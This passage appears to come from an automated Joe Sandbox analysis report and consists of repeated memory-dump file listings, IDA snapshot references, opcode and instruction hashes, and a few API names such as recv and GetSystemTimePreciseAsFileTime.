                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: recv
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1507349165-0
                                                                                                                                                                                                                                                                • Opcode ID: 7224eeb1e5708e725b292512675c6c43ba2e5f006f9ef173bef2ea5a87fc74ca
                                                                                                                                                                                                                                                                • Instruction ID: 4f0ba32b8be09b809d143ac227ff2045056db750e4cf7fdfa0a8dab6ae465da8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7224eeb1e5708e725b292512675c6c43ba2e5f006f9ef173bef2ea5a87fc74ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4131F8B5A042889BDB21CBADDC81BFF77BCEB49724F004625F514E7391C676AC458B60
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                                                • Instruction ID: 1a94c2546b5a78df7da47faa6dd62ed17771299926d48144bbee3c8010500243
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F15F72E012299FDF14CFADD9806ADBBB1FF49314F158269D915AB344D731AE01CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,009FCF52,?,00000003,00000003,?,009FCF87,?,?,?,00000003,00000003,?,009FC4FD,009E2FB9,00000001), ref: 009FCC03
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1802150274-0
                                                                                                                                                                                                                                                                • Opcode ID: ca0e3d703ec8a66dd951503ffd45db2e944ce068337b4b42ed4596844a07259f
                                                                                                                                                                                                                                                                • Instruction ID: 50e0daac0c6b173671251377a23e479a64257c29d3f7ee8b2d882a9efe431240
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca0e3d703ec8a66dd951503ffd45db2e944ce068337b4b42ed4596844a07259f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79D0223698203C938A056BD9EC008BDBB8C8A41B183004C21FF0897220CA917C015BD0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                                                                                                                • Instruction ID: dad9d2168c21afd59e619f3dafba6547c55355053ff76400f44cc99c22f771dd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7517B31608A4C6ADB388B2C89957FF77BB9F15300F14151DE482D7292CE5A9DCEC352
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
